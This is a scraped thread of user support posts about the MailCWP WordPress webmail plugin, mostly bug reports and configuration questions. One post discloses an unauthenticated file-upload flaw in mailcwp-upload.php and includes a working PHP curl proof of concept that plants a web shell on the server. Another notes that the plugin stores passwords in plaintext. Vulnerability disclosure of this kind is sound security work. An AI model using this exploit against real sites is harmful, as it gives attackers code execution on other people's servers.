I’ve got 404 error while accessing mydomain/mail address
]]>When I got to the admin panel and then click on MailCWP, it comes up with MailCWP Settings and then a list of linked options (e.g. MailCWP Folders). When I click on the links the page seems to be loading something (seems to be refreshing without actually going blank and refreshing) but remains on the exact same page and nothing else happens. How do I use these settings?
]]>Hello, first of all I consider this a very useful plugin! So everybody reading this bug list, please: consider it’s free and the developer needs a life too!
PROS:
– this plugin really works with any theme
– Every Blog User has ITS OWN Webmail !!
– it works in FRONT END!!
– it’s REALLY free (no demo period)!!
CONS:
Encountered bugs:
– I must leave the option to let users change theme, otherwise it doesn’t retain the theme imposed by Admin.
– In front end GUI there is no Attachment Column visible, so I cannot distinguish messages with attachments to those without (only by opening them it reveals the attachment presence)
– the GUI shows 2 times (doubled) the breadcrumb list of pages
– Passwords are NOT encrypted (this is bad…)
SUGGESTIONS:
– GUI is heavy… maybe it could be better using only CSS.. or leave it to WP Theme + CSS in Admin
Do not leave the development of this wonderful plugin! You Rock!
Let me know, as soon as possible for you, if the bugs above could be fixed or not.
Best regards.
]]>hi, the smtp server setting dosnt work to connect. but when im useing the same settings with another plugin. wp mail bank the settings is working and i can send mails. but they dont have a client as mail cwp has. so i would like to soulve this isses.
]]>Test fails and page with shortcode doesn’t recognoze the account. I have correct email settings from server (tested in Mail app) so it’s not the settings. The page with shortcode shows the correct email account name but with the message “No accounts found. Please contact the system administrator for assistance.”
]]>Does this plugin work? Is the plugin author still interested?
]]>Is there a way to make the button icons bigger ?
I tried
.ui-icon {
width: 26px!important;
height: 26px!important;
}
but the icons don’t get bigger it seems to add edge of next icon on the sheet to box as-well, but if I change to smaller value the icons do in fact shrink very weird .
Not been able to reverse engineer what’s effecting it yet .
In console it says
“https://mydomain/wp-content/plugins/mailcwp/js/jquery.jui_theme_switch.min.js?ver=4.3.1”
Not found yet I click its link in console and it opens so it is at right address.
Also
“https://mydomain/index.php/news/wp-content/plugins/mailcwp/js/json/themes.json?_=1442838751881”
Is not found this one is still not found when click console link but I assume that’s because the theme switch is not working.
and also all the images are not found and show errors in console.
Every other pluggin in my WordPress are working so I assume the error is within this pluggin.
Hope you can help
I can receive email OK but when I attempt to compose an email I get an error message…
Unable to compose message: error/Internal Server Error
Can you help please?
]]>I can’t seem to add any users or get the short code to work.
]]>Hello!
The code in mailcwp-upload.php doesn’t check that a user is authenticated or what type of file is being uploaded any user can upload a shell to the target wordpress server:
2 $message_id = $_REQUEST[“message_id”];
3 $upload_dir = $_REQUEST[“upload_dir”];
.
.
8 $fileName = $_FILES[“file”][“name”];
9 move_uploaded_file($_FILES[“file”][“tmp_name”], “$upload_dir/$message_id-$fileName”);
PoC:
<?php
/*Larry W. Cashdollar @_larry0
Exploit for mailcwp v1.99 shell will be called 1-shell.php.
7/9/2015
*/
$target_url = ‘https://www.example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1&upload_dir=/usr/share/wordpress/wp-content/uploads’;
$file_name_with_full_path = ‘/var/www/shell.php’;
echo “POST to $target_url $file_name_with_full_path”;
$post = array(‘file’ => ‘shell.php’,’file’=>’@’.$file_name_with_full_path);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo “<hr>”;
echo $result;
echo “<hr>”;
?>
Thanks
Larry
I have bought all plugins and excluded them and other plugins, changed theme, still getting the following error:
Unable to parse Ajax response. JSON.parse: unexpected character at line 1 column 1 of the JSON data
Please advise.
]]>Hello, thank you already for the plugin is what I wanted.
I have a problem with the configuration of an account, there is too much data to be added and I do not know everything. What to put in? The configuration below is it correct?
Name: [email protected]
Email:[email protected] (what mail?)
Host: mysite.com
Port:21
Use SSL:yes
Validate Certificates:yes
Username: [email protected] (what mail?)
Password: my-mail-password
Use start-TLS: yes
Host:mysite.com
SMTP Port:21
SMTP server requires authentication:yes
SMTP Username: [email protected] (what mail?)
SMTP Password: my-mail-password
Sound alert when new mail arrives: yes
Default account: yes
I tried a test with my confguration but I have a message: failled Test: Test Failled: Can not connect to server
Thanks!
]]>I upgraded to latest version recently but what i see now is there is nothing showing on the front-end and i found these error on my console:
Uncaught TypeError: jQuery(…).accordion is not a function : mailcwp.js?ver=4.1.2:4
(anonymous function) @ mailcwp.js?ver=4.1.2:4
m.Callbacks.j @ jquery.js?ver=1.11.1:2
m.Callbacks.k.fireWith @ jquery.js?ver=1.11.1:2
m.extend.ready @ jquery.js?ver=1.11.1:2
J @ jquery.js?ver=1.11.1:2
GET https://www.yocta.com/wp-content/plugins/mailcwp/css/images/ui-bg_flat_75_ffffff_40x100.png 404 (Not Found) : jquery.js?ver=1.11.1:3
a.getComputedStyle.Jb @ jquery.js?ver=1.11.1:3
m.extend.css @ jquery.js?ver=1.11.1:3
U @ jquery.js?ver=1.11.1:3
Vb @ jquery.js?ver=1.11.1:3
m.fn.extend.hide @ jquery.js?ver=1.11.1:3
m.each.m.fn.(anonymous function) @ jquery.js?ver=1.11.1:4
a.widget._create @ autocomplete.min.js?ver=1.11.2:11
(anonymous function) @ widget.min.js?ver=1.11.2:11
a.Widget._createWidget @ widget.min.js?ver=1.11.2:11
a.widget.a.(anonymous function).(anonymous function) @ widget.min.js?ver=1.11.2:11
(anonymous function) @ widget.min.js?ver=1.11.2:11
m.extend.each @ jquery.js?ver=1.11.1:2
m.fn.m.each @ jquery.js?ver=1.11.1:2
a.widget.bridge.a.fn.(anonymous function) @ widget.min.js?ver=1.11.2:11
(anonymous function) @ buddypress-global-search.min.js?ver=1.0.4:1
m.extend.each @ jquery.js?ver=1.11.1:2
m.fn.m.each @ jquery.js?ver=1.11.1:2
(anonymous function) @ buddypress-global-search.min.js?ver=1.0.4:1
m.Callbacks.j @ jquery.js?ver=1.11.1:2
m.Callbacks.k.fireWith @ jquery.js?ver=1.11.1:2
m.extend.ready @ jquery.js?ver=1.11.1:2
J @ jquery.js?ver=1.11.1:2
Get all MailCWP add-ons half price until the end of April!
Visit the MailCWP Plugin page at cadreworks.com for details.
When checking out enter the following discount code to get 50% off: APRIL2015_50PCT.
]]>Hi,
If I do not allow users to change theme, then the buttons are not displayed with images, they are empty. At the point I allow to choose the theme, they are displayed well. It dosn′t matter which theme I choose, the result is the same. Even if I change the side-theme as well, there is the same problem ( I′ve tried different ones, even payed themes with lots of features )
Getting a new error message all of a sudden. Not sure what it means since I am setting up the new user the same as I have all the others. Could someone please take a look I’m payment #495
]]>Hi there,
after installation of mailcwp I had following problem with User Role Editor Pro:
1) I was unable to change settings of my users, the changings are displayed, but the rules aren′t activated at the user.
2) The Text in some Cofirmation-boxes at URE was invisible, the main setup-box of URE was also invisible
As i deactivated mailCWP everything was all rigth again.
Hope you can help me so solve that problem, want to use this great mailplugin again!
]]>Hi there,
is there any pot or po file for translation?
would be very helpful, if you would publish one, Thanks
I cannot set UTC -5
I have verified that my server is ok and i have done other things with the website that creates a time stamp and it uses the UTC-5, however, i cannot get MailCWP to recognize UTC-5
Nicholas.
Just as the title says, i am able to read mail, but not delete it. any ideas?
]]>When using your plugin, it places the Spam folder as the default because of the names of the folders in the mail directory. I am unable to change the names of the folders (as they are installed by a batch script in Virtualmin). I need a way to change the sort order, or instead have it ALWAYS load INBOX as first (inbox is a mixture of cur (or current/already read) and new (unread mail)).
Anyone have any idea how to change this in the code, or can we get a feature that allows the USER to select the default landing folder?
this feature would be very useful as many of my users are attaching not only their domain emails, but their personal emails aswell (gmail and such).
1. How may i activate your plugins?
2. it seems that it takes a while to open an email?
alrighty I tested it n a second server and it works great in IE
so I uploaded itto my clients site and the screen shot below is what I get
https://fairygoodtimes.com.au/staff/wp-content/uploads/2014/12/email2.jpg
where the arrow is pointing- this loading star is always loading nothing is happening buttons don’t work
when I turn off all plugins except your email program I get the screen shot below
https://fairygoodtimes.com.au/staff/wp-content/uploads/2014/12/email3.jpg\
which is asking me to log in- but has no log in form and as you can see from the upper right corner I am already logged in
I live in Sydney Australia I am happy to give you admin access if that helps [email protected]
I am happy to pay for a solution
Hello- great plugin however there is 1 problem I am having which I hope you can help
I receive emails easily enough however when I click reply it automatically adds the following code to the email which I don’t want and I have no idea how to stop
\here is the code:
On Wed 3 December 2014, at 5:28pm, David Welzman <[email protected]> wrote:
> <html xmlns:v=”urn:schemas-microsoft-com:vml” xmlns:o=”urn:schemas-microsoft-com:office:office” xmlns:w=”urn:schemas-microsoft-com:office:word” xmlns:m=”https://schemas.microsoft.com/office/2004/12/omml” xmlns=”https://www.w3.org/TR/REC-html40″><head><META HTTP-EQUIV=”Content-Type” CONTENT=”text/html; charset=us-ascii”><meta name=ProgId content=Word.Document><meta name=Generator content=”Microsoft Word 14″><meta name=Originator content=”Microsoft Word 14″><link rel=File-List href=”cid:[email protected]″><!–[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:AllowPNG></o:AllowPNG>
</o:OfficeDocumentSettings>
</xml><![endif]–><!–[if gte mso 9]><xml>
<w:WordDocument>
<w:SpellingState>Clean</w:SpellingState>
<w:TrackMoves></w:TrackMoves>
<w:TrackFormatting></w:TrackFormatting>
<w:EnvelopeVis></w:EnvelopeVis>
<w:PunctuationKerning></w:PunctuationKerning>
<w:ValidateAgainstSchemas></w:ValidateAgainstSchemas>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF></w:DoNotPromoteQF>
<w:LidThemeOther>EN-AU</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables></w:BreakWrappedTables>
<w:SnapToGridInCell></w:SnapToGridInCell>
<w:WrapTextWithPunct></w:WrapTextWithPunct>
<w:UseAsianBreakRules></w:UseAsianBreakRules>
<w:DontGrowAutofit></w:DontGrowAutofit>
<w:SplitPgBreakAndParaMark></w:SplitPgBreakAndParaMark>
<w:EnableOpenTypeKerning></w:EnableOpenTypeKerning>
<w:DontFlipMirrorIndents></w:DontFlipMirrorIndents>
<w:OverrideTableStyleHps></w:OverrideTableStyleHps>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val=”Cambria Math”></m:mathFont>
<m:brkBin m:val=”before”></m:brkBin>
<m:brkBinSub m:val=”–“></m:brkBinSub>
<m:smallFrac m:val=”off”></m:smallFrac>
<m:dispDef></m:dispDef>
<m:lMargin m:val=”0″></m:lMargin>
<m:rMargin m:val=”0″></m:rMargin>
<m:defJc m:val=”centerGroup”></m:defJc>
<m:wrapIndent m:val=”1440″></m:wrapIndent>
<m:intLim m:val=”subSup”></m:intLim>
<m:naryLim m:val=”undOvr”></m:naryLim>
</m:mathPr></w:WordDocument>
</xml><![endif]–><!–[if gte mso 9]><xml>
<w:LatentStyles DefLockedState=”false” DefUnhideWhenUsed=”true” DefSemiHidden=”true” DefQFormat=”false” DefPriority=”99″ LatentStyleCount=”267″>
<w:LsdException Locked=”false” Priority=”0″ SemiHidden=”false” UnhideWhenUsed=”false” QFormat=”true” Name=”Normal”></w:LsdException>
<w:LsdException Locked=”false” Priority=”9″ SemiHidden=”false” UnhideWhenUsed=”false” QFormat=”true” Name=”heading 1″></w:LsdException>
<w:LsdException Locked=”false” Priority=”9″ QFormat=”true” Name=”heading 2″></w:LsdException>
<w:LsdException Locked=”false” Priority=”9″ QFormat=”true” Name=”heading 3″></w:LsdException>
<w:LsdException Locked=”false” Priority=”9″ QFormat=”true” Name=”heading 4″></w:LsdException>
<w:LsdException Locked=”false” Priority=”9″ QFormat=”true” Name=”heading 5″></w:LsdException>
<w:LsdException Locked=”false” Priority=”9″ QFormat=”true” Name=”heading 6″></w:LsdException>
<w:LsdException Locked=”false” Priority=”9″ QFormat=”true” Name=”heading 7″></w:LsdException>
<w:LsdException Locked=”false” Priority=”9″ QFormat=”true” Name=”heading 8″></w:LsdException>
<w:LsdException Locked=”false” Priority=”9″ QFormat=”true” Name=”heading 9″></w:LsdException>
<w:LsdException Locked=”false” Priority=”39″ Name=”toc 1″></w:LsdException>
<w:LsdException Locked=”false” Priority=”39″ Name=”toc 2″></w:LsdException>
<w:LsdException Locked=”false” Priority=”39″ Name=”toc 3″></w:LsdException>
<w:LsdException Locked=”false” Priority=”39″ Name=”toc 4″></w:LsdException>
<w:LsdException Locked=”false” Priority=”39″ Name=”toc 5″></w:LsdException>
<w:LsdException Locked=”false” Priority=”39″ Name=”toc 6″></w:LsdException>
<w:LsdException Locked=”false” Priority=”39″ Name=”toc 7″></w:LsdException>
<w:LsdException Locked=”false” Priority=”39″ Name=”toc 8″></w:LsdException>
<w:LsdException Locked=”false” Priority=”39″ Name=”toc 9″></w:LsdException>
<w:LsdException Locked=”false” Priority=”35″ QFormat=”true” Name=”caption”></w:LsdException>
<w:LsdException Locked=”false” Priority=”10″ SemiHidden=”false” UnhideWhenUsed=”false” QFormat=”true” Name=”Title”></w:LsdException>
<w:LsdException Locked=”false” Priority=”1″ Name=”Default Paragraph Font”></w:LsdException>
<w:LsdException Locked=”false” Priority=”11″ SemiHidden=”false” UnhideWhenUsed=”false” QFormat=”true” Name=”Subtitle”></w:LsdException>
<w:LsdException Locked=”false” Priority=”22″ SemiHidden=”false” UnhideWhenUsed=”false” QFormat=”true” Name=”Strong”></w:LsdException>
<w:LsdException Locked=”false” Priority=”20″ SemiHidden=”false” UnhideWhenUsed=”false” QFormat=”true” Name=”Emphasis”></w:LsdException>
<w:LsdException Locked=”false” Priority=”59″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Table Grid”></w:LsdException>
<w:LsdException Locked=”false” UnhideWhenUsed=”false” Name=”Placeholder Text”></w:LsdException>
<w:LsdException Locked=”false” Priority=”1″ SemiHidden=”false” UnhideWhenUsed=”false” QFormat=”true” Name=”No Spacing”></w:LsdException>
<w:LsdException Locked=”false” Priority=”60″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Light Shading”></w:LsdException>
<w:LsdException Locked=”false” Priority=”61″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Light List”></w:LsdException>
<w:LsdException Locked=”false” Priority=”62″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Light Grid”></w:LsdException>
<w:LsdException Locked=”false” Priority=”63″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Shading 1″></w:LsdException>
<w:LsdException Locked=”false” Priority=”64″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Shading 2″></w:LsdException>
<w:LsdException Locked=”false” Priority=”65″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium List 1″></w:LsdException>
<w:LsdException Locked=”false” Priority=”66″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium List 2″></w:LsdException>
<w:LsdException Locked=”false” Priority=”67″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Grid 1″></w:LsdException>
<w:LsdException Locked=”false” Priority=”68″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Grid 2″></w:LsdException>
<w:LsdException Locked=”false” Priority=”69″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Grid 3″></w:LsdException>
<w:LsdException Locked=”false” Priority=”70″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Dark List”></w:LsdException>
<w:LsdException Locked=”false” Priority=”71″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Colorful Shading”></w:LsdException>
<w:LsdException Locked=”false” Priority=”72″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Colorful List”></w:LsdException>
<w:LsdException Locked=”false” Priority=”73″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Colorful Grid”></w:LsdException>
<w:LsdException Locked=”false” Priority=”60″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Light Shading Accent 1″></w:LsdException>
<w:LsdException Locked=”false” Priority=”61″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Light List Accent 1″></w:LsdException>
<w:LsdException Locked=”false” Priority=”62″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Light Grid Accent 1″></w:LsdException>
<w:LsdException Locked=”false” Priority=”63″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Shading 1 Accent 1″></w:LsdException>
<w:LsdException Locked=”false” Priority=”64″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Shading 2 Accent 1″></w:LsdException>
<w:LsdException Locked=”false” Priority=”65″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium List 1 Accent 1″></w:LsdException>
<w:LsdException Locked=”false” UnhideWhenUsed=”false” Name=”Revision”></w:LsdException>
<w:LsdException Locked=”false” Priority=”34″ SemiHidden=”false” UnhideWhenUsed=”false” QFormat=”true” Name=”List Paragraph”></w:LsdException>
<w:LsdException Locked=”false” Priority=”29″ SemiHidden=”false” UnhideWhenUsed=”false” QFormat=”true” Name=”Quote”></w:LsdException>
<w:LsdException Locked=”false” Priority=”30″ SemiHidden=”false” UnhideWhenUsed=”false” QFormat=”true” Name=”Intense Quote”></w:LsdException>
<w:LsdException Locked=”false” Priority=”66″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium List 2 Accent 1″></w:LsdException>
<w:LsdException Locked=”false” Priority=”67″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Grid 1 Accent 1″></w:LsdException>
<w:LsdException Locked=”false” Priority=”68″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Grid 2 Accent 1″></w:LsdException>
<w:LsdException Locked=”false” Priority=”69″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Grid 3 Accent 1″></w:LsdException>
<w:LsdException Locked=”false” Priority=”70″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Dark List Accent 1″></w:LsdException>
<w:LsdException Locked=”false” Priority=”71″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Colorful Shading Accent 1″></w:LsdException>
<w:LsdException Locked=”false” Priority=”72″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Colorful List Accent 1″></w:LsdException>
<w:LsdException Locked=”false” Priority=”73″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Colorful Grid Accent 1″></w:LsdException>
<w:LsdException Locked=”false” Priority=”60″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Light Shading Accent 2″></w:LsdException>
<w:LsdException Locked=”false” Priority=”61″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Light List Accent 2″></w:LsdException>
<w:LsdException Locked=”false” Priority=”62″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Light Grid Accent 2″></w:LsdException>
<w:LsdException Locked=”false” Priority=”63″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Shading 1 Accent 2″></w:LsdException>
<w:LsdException Locked=”false” Priority=”64″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Shading 2 Accent 2″></w:LsdException>
<w:LsdException Locked=”false” Priority=”65″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium List 1 Accent 2″></w:LsdException>
<w:LsdException Locked=”false” Priority=”66″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium List 2 Accent 2″></w:LsdException>
<w:LsdException Locked=”false” Priority=”67″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Grid 1 Accent 2″></w:LsdException>
<w:LsdException Locked=”false” Priority=”68″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Grid 2 Accent 2″></w:LsdException>
<w:LsdException Locked=”false” Priority=”69″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Grid 3 Accent 2″></w:LsdException>
<w:LsdException Locked=”false” Priority=”70″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Dark List Accent 2″></w:LsdException>
<w:LsdException Locked=”false” Priority=”71″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Colorful Shading Accent 2″></w:LsdException>
<w:LsdException Locked=”false” Priority=”72″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Colorful List Accent 2″></w:LsdException>
<w:LsdException Locked=”false” Priority=”73″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Colorful Grid Accent 2″></w:LsdException>
<w:LsdException Locked=”false” Priority=”60″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Light Shading Accent 3″></w:LsdException>
<w:LsdException Locked=”false” Priority=”61″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Light List Accent 3″></w:LsdException>
<w:LsdException Locked=”false” Priority=”62″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Light Grid Accent 3″></w:LsdException>
<w:LsdException Locked=”false” Priority=”63″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Shading 1 Accent 3″></w:LsdException>
<w:LsdException Locked=”false” Priority=”64″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Shading 2 Accent 3″></w:LsdException>
<w:LsdException Locked=”false” Priority=”65″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium List 1 Accent 3″></w:LsdException>
<w:LsdException Locked=”false” Priority=”66″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium List 2 Accent 3″></w:LsdException>
<w:LsdException Locked=”false” Priority=”67″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Grid 1 Accent 3″></w:LsdException>
<w:LsdException Locked=”false” Priority=”68″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Grid 2 Accent 3″></w:LsdException>
<w:LsdException Locked=”false” Priority=”69″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Grid 3 Accent 3″></w:LsdException>
<w:LsdException Locked=”false” Priority=”70″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Dark List Accent 3″></w:LsdException>
<w:LsdException Locked=”false” Priority=”71″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Colorful Shading Accent 3″></w:LsdException>
<w:LsdException Locked=”false” Priority=”72″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Colorful List Accent 3″></w:LsdException>
<w:LsdException Locked=”false” Priority=”73″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Colorful Grid Accent 3″></w:LsdException>
<w:LsdException Locked=”false” Priority=”60″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Light Shading Accent 4″></w:LsdException>
<w:LsdException Locked=”false” Priority=”61″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Light List Accent 4″></w:LsdException>
<w:LsdException Locked=”false” Priority=”62″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Light Grid Accent 4″></w:LsdException>
<w:LsdException Locked=”false” Priority=”63″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Shading 1 Accent 4″></w:LsdException>
<w:LsdException Locked=”false” Priority=”64″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Shading 2 Accent 4″></w:LsdException>
<w:LsdException Locked=”false” Priority=”65″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium List 1 Accent 4″></w:LsdException>
<w:LsdException Locked=”false” Priority=”66″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium List 2 Accent 4″></w:LsdException>
<w:LsdException Locked=”false” Priority=”67″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Grid 1 Accent 4″></w:LsdException>
<w:LsdException Locked=”false” Priority=”68″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Grid 2 Accent 4″></w:LsdException>
<w:LsdException Locked=”false” Priority=”69″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Grid 3 Accent 4″></w:LsdException>
<w:LsdException Locked=”false” Priority=”70″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Dark List Accent 4″></w:LsdException>
<w:LsdException Locked=”false” Priority=”71″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Colorful Shading Accent 4″></w:LsdException>
<w:LsdException Locked=”false” Priority=”72″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Colorful List Accent 4″></w:LsdException>
<w:LsdException Locked=”false” Priority=”73″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Colorful Grid Accent 4″></w:LsdException>
<w:LsdException Locked=”false” Priority=”60″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Light Shading Accent 5″></w:LsdException>
<w:LsdException Locked=”false” Priority=”61″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Light List Accent 5″></w:LsdException>
<w:LsdException Locked=”false” Priority=”62″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Light Grid Accent 5″></w:LsdException>
<w:LsdException Locked=”false” Priority=”63″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Shading 1 Accent 5″></w:LsdException>
<w:LsdException Locked=”false” Priority=”64″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Shading 2 Accent 5″></w:LsdException>
<w:LsdException Locked=”false” Priority=”65″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium List 1 Accent 5″></w:LsdException>
<w:LsdException Locked=”false” Priority=”66″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium List 2 Accent 5″></w:LsdException>
<w:LsdException Locked=”false” Priority=”67″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Grid 1 Accent 5″></w:LsdException>
<w:LsdException Locked=”false” Priority=”68″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Grid 2 Accent 5″></w:LsdException>
<w:LsdException Locked=”false” Priority=”69″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Grid 3 Accent 5″></w:LsdException>
<w:LsdException Locked=”false” Priority=”70″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Dark List Accent 5″></w:LsdException>
<w:LsdException Locked=”false” Priority=”71″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Colorful Shading Accent 5″></w:LsdException>
<w:LsdException Locked=”false” Priority=”72″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Colorful List Accent 5″></w:LsdException>
<w:LsdException Locked=”false” Priority=”73″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Colorful Grid Accent 5″></w:LsdException>
<w:LsdException Locked=”false” Priority=”60″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Light Shading Accent 6″></w:LsdException>
<w:LsdException Locked=”false” Priority=”61″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Light List Accent 6″></w:LsdException>
<w:LsdException Locked=”false” Priority=”62″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Light Grid Accent 6″></w:LsdException>
<w:LsdException Locked=”false” Priority=”63″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Shading 1 Accent 6″></w:LsdException>
<w:LsdException Locked=”false” Priority=”64″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Shading 2 Accent 6″></w:LsdException>
<w:LsdException Locked=”false” Priority=”65″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium List 1 Accent 6″></w:LsdException>
<w:LsdException Locked=”false” Priority=”66″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium List 2 Accent 6″></w:LsdException>
<w:LsdException Locked=”false” Priority=”67″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Grid 1 Accent 6″></w:LsdException>
<w:LsdException Locked=”false” Priority=”68″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Grid 2 Accent 6″></w:LsdException>
<w:LsdException Locked=”false” Priority=”69″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Medium Grid 3 Accent 6″></w:LsdException>
<w:LsdException Locked=”false” Priority=”70″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Dark List Accent 6″></w:LsdException>
<w:LsdException Locked=”false” Priority=”71″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Colorful Shading Accent 6″></w:LsdException>
<w:LsdException Locked=”false” Priority=”72″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Colorful List Accent 6″></w:LsdException>
<w:LsdException Locked=”false” Priority=”73″ SemiHidden=”false” UnhideWhenUsed=”false” Name=”Colorful Grid Accent 6″></w:LsdException>
<w:LsdException Locked=”false” Priority=”19″ SemiHidden=”false” UnhideWhenUsed=”false” QFormat=”true” Name=”Subtle Emphasis”></w:LsdException>
<w:LsdException Locked=”false” Priority=”21″ SemiHidden=”false” UnhideWhenUsed=”false” QFormat=”true” Name=”Intense Emphasis”></w:LsdException>
<w:LsdException Locked=”false” Priority=”31″ SemiHidden=”false” UnhideWhenUsed=”false” QFormat=”true” Name=”Subtle Reference”></w:LsdException>
<w:LsdException Locked=”false” Priority=”32″ SemiHidden=”false” UnhideWhenUsed=”false” QFormat=”true” Name=”Intense Reference”></w:LsdException>
<w:LsdException Locked=”false” Priority=”33″ SemiHidden=”false” UnhideWhenUsed=”false” QFormat=”true” Name=”Book Title”></w:LsdException>
<w:LsdException Locked=”false” Priority=”37″ Name=”Bibliography”></w:LsdException>
<w:LsdException Locked=”false” Priority=”39″ QFormat=”true” Name=”TOC Heading”></w:LsdException>
</w:LatentStyles>
</xml><![endif]–><style><!–
/* Font Definitions */
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:-536870145 1073786111 1 0 415 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-parent:””;
margin:0cm;
